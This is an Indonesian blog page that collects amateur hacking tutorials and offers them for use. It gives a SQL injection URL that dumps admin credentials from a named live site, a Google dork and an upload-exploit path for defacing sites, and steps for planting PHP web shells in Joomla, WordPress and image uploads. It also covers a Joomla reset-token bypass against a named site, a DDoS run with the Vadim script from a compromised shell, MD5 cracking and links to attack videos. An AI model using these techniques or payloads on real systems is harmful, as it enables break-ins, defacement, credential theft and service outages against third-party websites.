Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Havij v1.10

------------------------------
STEP 1 Inject Url Target
------------------------------
Masukan Url target di coloums paling atas lalu klik Analize


Lihat coloums pling bawah untuk mengetahui Vuln target & jumlah coloumn
pastekan url di browser dengan jumlah coloumn yang ada di Havij
teknik yang di gunakan disini (SQL injection ) untuk mencari username & password
contoh :
http://www.arenabola.com/?page=artikel&id=9+AND+1=2+union+select+1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12+from+admin--

----------------------------------------------------------------------
STEP 2 Menghash Password apabila masih berbentuk MD5
------------------------------------------------------------------------
Pilih MD5 & masukan password yang akan d hash...lalu klik Start
Password akan di hash secara online oleh havij di 15 Situs Hash password
Hasil
----------------------------------------
STEP 3 Mencari Halaman admin
----------------------------------------
Msukan url target lalu pilih Find Admin

Alhamdulillah user/password dan halaman admin sudah ketemu....tinggal di upload shell'y .....
Ry klo ada yang salah - masih newbie Grin
Semoga bermanfaat Grin

Read more


Mencari Halaman Login website Menggunakan AEP Sql Injection

Ok guyssss,,, udah lama banget nich g posting disn
kebetulan kemaren sakit,,, jadi g bisa mikir yang jernih,,, mikir kotor aja susah
wakakakaakka

Nah,,,setelah sekian lama mendekam dirumah,, akhirnya hari ini ane bisa poting lagi,,,memang hari2 yang membosankan dirumah terus tanpa koneksi internet...
Kebetulan kemaren ada yang nanya nich,, gimana caranya mencari halaman login admin website,,, OK guys,,,
Mudah kok,,, coba aja dulu pakai tebak2an...
ex : wwww.site.com/admin or www.site.net/login.php
kalau g bisa nebak u gunakan tool yang satu ini,,, lumayan ampuh jg,,, ( eh bukan lumayan lagi,, tapi bener2 ampuh kok hehehehehe )



Nama toolsnya AutoExploit Sql Injection.. sebenarnya tools ini buat nginject situs jg,, tapi kayaknya kurang maknyus buat nginject,, tapi lebih maknyus buat scanning login page...
Cara menggunakan gampang bangettttt,,,
Masukan situs target pada Target ex : http://www.travellingbirder.com
n then klik Tools -> Scan Links
trus muncul box kecil dibawah, biasanya pas diatas menu star,, bentuknya segi empat transparan n then klik dibagian atasnya yang ada tulisan "Click Here"... Proses searching pun dimulai,,,, Untuk melihat hasilnya Klik Tools -> Scan Link Result
Ni hasilnya ....
Selamat berburu hehhehhehehe.....


Dowload Here

by = http://www.vanderta.co.cc/search/label/Software

Read more


tutor simple defacing xixi

sebelum kegiatan alangkah baik'y berdoa dolo
ok langsung z

Dork = allinurl:"/cgi-bin/ourspace
exploid = /cgi-bin/ourspace/newswire/uploadmedia.cgi

- Buka google = masukan dork tadi
- Example target : http://www.israelbego.com/cgi-bin/ourspace//login.cgi
- Hapus /cgi-bin/ourspace//login.cgi
- & kemudian ganti dengan Exploit
- Jadi : http://www.israelbego.com/cgi-bin/ourspace/newswire/uploadmedia.cgi
- Enter dah tu Url (abrakadabraaaaaa...)

Wihh gi beruntung nih ente d beri akses upload file ^-^.....
skarang upload file Html kamu (H4ck By _ _ _ _)

Enjoy defacing

Read more


tutor menanam shell

Mungkin ada kendala yah setelah takeover web lewat bug sqli, kita cuma dapet akses ke panel admin, berbahagialah kalo cmsnya ada fitus upload gambar, hehehe kendalanya cuma upload gambar, upload php? ini gunanya tutorial ini

Jika cms target Joomla

anda dapat mengubah file yang dapat di upload di media pada settingan di Global Configuration di tab system tambah ekstensi php kemudian save. Setelah itu upload shell anda di media manajemen. shell anda akan berada pada direktori site.name/images/namaphpshellnya.php

Jika cms target WordPress

anda dapat mengupload BD dengan cara mengkompres dahulu phpshell anda ke dalam format *.zip , kemudian add new plugins , pilih upload , upload phpshell.zip anda, file tersebut akan berada pada direktori site.nama/wp-content/plugins/namafolderzipnya/namaphpshellnya.php

Jika cms target cms biasa / selain diatas

anda dapat mengupload phpshell anda di bagian dimana terdapat form upload picture, sebelumnya ubah dulu ekstensi phpshell anda menjadi namashell.php.jpg atau dengan null byte menjadi: namashell.php.jpg

Jika cms tidak menerima upload shell dengan nullbyte

Pakai aplikasi kecil bernama edjpgcom, aplikasi ini bisa menulis suatu skrip kedalam sebuah file gambar

DOWNLOAD:

http://www.chapelhill.homeip.net/horton/copies/edjpgcom/edjpgcom.zip

lalu diekstrak, saya sarankan diekstrak di C: (C:\edjpgcom.exe)

Cara memakainya, buka command prompt, lalu arahkan (ganti current directory) ke C:\

sebelum itu, siapkan file gambarnya, dan taruh di C:\ juga misal: gambar.jpg

kembali ke command prompt, ketik “edjpgcom.exe gambar.jpg” (tanpa tanda kutip pastinya) ntar ada keuar form, nah, tinggal masukkan skrip kalian lalu OK

Sekarang file anda sudah ada skripnya

Sekian dulu dari saya

Thanks to: r3m1ck dan zee_eichel dari Tecon

Read more


Tutorial - Hack With Token

Nah mungkin semua udah pada ngerti tentang hack atau deface web dengan tekhnik Token
kali ini saya menjelaskan sedikit tekhnik token tersebut.

pertama cari search engine yang menurut kalian bagus,,kali ini pke tante google yah.
terus ketik di searchnya
inurl:option=com_user daerah / negara tujuan = daerah tujuan terderah kalian disini saya menggunakan inurl:option=com_user singapura
atau inurl:option=com_user site:.sg
setelah itu cari target yang akan kalian coba masuki,contohnya ini

http://www.mumcentre.com/index.php?option=com_user&task=register

lalu ganti seperti ni

option=com_user&view=reset&layout=confirm

maka URL akan menjadi seperti ini
http://www.mumcentre.com/index.php?option=com_user&view=reset&layout=confirm

setelah URl itu kita klik maka akan muncul apa yang namanay token,,.
apa yang harus kalian lakukan..??
yang harus kalian lakukan adalah memasukan karakter single quote (`) pada token tersebut..!!

jika kalain berhasil mengakses menu buat reset password tersebut,,maka masukan password sesuka hati kalian (apa aja deh)..
setelah itu akan keluar suskes dari ganti password tersebut..

Nah kali ini kalian akan,mencari hal login dari ste tersebut..

stelah ketemu maka login lah kalian dengan usernae admin terus passwordnya dengan password yang kalian isikan tadi.
jika beruntung maka kalian akan bisa mengakses hal admin dari web tersebut.
terserah kalian mau apa z terhadap web tersebut karena kalian jadi admin dari web tersebut..

Thank To bobyhikaru.

Read more


Hacking Video Tutorial - Collection

Untuk para nyubi kya ane T_T
silahkan didownload video'y ^_^

Bila ada password : al_bantani
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Phpmyadmin
http://www.4shared.com/file/pz7Ozrjr/phpmyadmin.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Cpanel Hacking
http://www.4shared.com/file/G3pXG06c/C_p4nel.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Brute Force
http://www.4shared.com/file/NT-NDbjs/tutoraccountBruteForce.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Joomla Reset Password
http://www.4shared.com/file/MIecxKVa/joomla_reset_pass.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - RFI Metode + Patch
http://www.4shared.com/file/Ov_3yd9W/RFI_Patc.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - LFI (Local file disclosure)
http://www.4shared.com/file/jSmkcNrR/L_F_I.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli Backdoring
http://www.4shared.com/file/8mmHwxxW/SQLi_B4CKd0r.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Deface HTML
http://www.4shared.com/file/hkxQik5C/DefacHTML-Injec.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli V.4
http://www.4shared.com/file/IBQ-RZU1/S-v4.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli V.5
http://www.4shared.com/document/K4_kSuXf/Tutorial_SQL_Injection.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Jumping
http://www.4shared.com/file/Agmx67u5/JumP_N4ck0.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Metasploit
http://www.4shared.com/file/fx87EhEY/tutor_metas.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Rooting
http://www.4shared.com/file/Z7YF5ahj/R00tin9.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Asp Sql inj_TUTOR
http://www.4shared.com/file/X60x9df6/asp-sql-inj_TUTOR.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Scemafuzzy
http://www.4shared.com/file/FDOJKC3d/Scema.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Backdoring + Inject + Deface
http://www.4shared.com/file/QMSTE8zc/_2__BackInjectDef.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Sqli Malingsial Version
http://www.4shared.com/file/xfy-al-Q/Malingsial.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Patching Joomla
http://www.4shared.com/file/a_GUfnkm/joomla_patch.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Hacking Video Tutorial - Defacing Tutorial
http://www.4shared.com/file/Hu4IxoNG/Defac-Tutor.html
---------------------------------------------------------------------
---------------------------------------------------------------------
Thank To : All indonesian hacker and defacer

Read more


Tutorial - DDOS Menggunakan Vadim

Sebelum'y pahami dulu arti'y, Serangan DOS.
Silahkan dibaca dulu pengertian'y --> http://id.wikipedia.org/wiki/Serangan_DoS

Step yang dilakukan dalam melakukan serangan Ddos:
1. Connect ke korban (host, port).
2. Kirimkan paket data dalam jumlah besar.
3. koneksi terputus > selesai.

Sebenar'y masih banyak tekhnik DDOS ATTACK.
tapi Yang akan ane bahas disini adalah Ddos dengan menggunakan shell dengan VADIM Sebagai senjata untuk menyerang.

Langkah Pertama :

Langkah Kedua :
Upload Vadim yg dagh di donlot tadi ke Shell kalian. Kalo belum punya shell. silahkan minta ke temen.
Shell hrs dlm keadaan safemode Off, chmod'y permissionnya disetting 777 artinya kita mampu melakukan aksi baca, tulis dan eksekusi terhadap file tersebut.

Langkah Ketiga :
Ekstrak file Vadim menggunakan perintah --> tar -zxvf vadim.tar.gz Klik go
Screenshoot'y kek gini :














Setelah di ekstrak, nanti akan tercipta sebuah folder nama folder'y --> [Dos]. Setelah itu Klik folder tersebut. Kita masuk ke directory'y.

Langkah Keempat :
Setelah semua'y siap, ketik ini -->./vadimI [iptarget] [port] [jumlah paket]

Contoh : 111.111.111.111 80 9999999999999999999999 Klik go
Screenshoot :



















Selanjut'y Klik go, and Kita tunggu hasil'y.

Thank To Patriot

Read more


Hacking Web With Sql Helper v2.7

------------------

---------------------------------------------------------------
Site Demo :
http://www.aubergine.in.th/en/newsdetail.php?id=25
---------------------------------------------------------------
Untuk tool'y download d mari
------------------------------------------------------------
http://www.4shared.com/file/LLITOZ30/H4ck3r_c1sadan3.html
------------------------------------------------------------
-------
Step 1
-------
* Buka Tool'y lalu masukan url target
KLIK INJECT
[Image: 14881199554288080979.jpg]
-------
Step 2
-------
* Lalu Pilih nama databese klik GET DATABASE
setelah muncul nama table klik GET TABLES
[Image: 17213672513604470525.jpg]
-------
Step 3
-------
* Pilih nama table lalu klik GET COLUMNS
[Image: 08058806427984672616.jpg]
-------
Step 4
-------
Didalam table columns muncul nama username or password
Skarang tinggal klik DUMP NOW
[Image: 98936107769544580143.jpg]

[Image: 75554461739596437586.jpg]
Muncul dah tu nama si admin sma password'y.. ^_^
Note: Apabila password berbentuk Md5 bisa di hash dimari
http://www.md5decrypter.co.uk/
Tinggal cari dah page admin'y ^-^
mudah kan Tongue

Read more

LInk Teman

.:: Worfreeid Crew ::. Banner Maker


code security
uzanc

Trafik

Hackerlink Forum